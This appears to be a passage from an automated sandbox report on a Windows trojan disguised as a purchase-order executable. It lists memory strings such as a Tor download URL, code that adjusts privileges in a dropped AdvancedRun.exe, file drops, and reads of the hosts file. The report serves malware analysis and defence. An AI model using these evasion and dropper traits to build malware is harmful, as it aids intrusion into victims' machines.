                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBB01_2_00A2CBB0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A244E01_2_00A244E0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A24C581_2_00A24C58
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBA01_2_00A2CBA0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA97032_2_010DA970
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B832_2_010D28B8
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D22D032_2_010D22D0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA96B32_2_010DA96B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: invalid certificate
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilename vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.306148340.0000000007CA8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHcAj CBJ.exe2 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000000.202307233.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.293666584.00000000044C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288756404.0000000000CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302392796.0000000006580000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.298745128.0000000005590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288723697.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000011.00000000.276780249.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@35/25@2/2
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,5_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,6_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,5_2_004095FD
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,5_2_0040A33B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUojJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4952
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1fJump to behavior
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hosts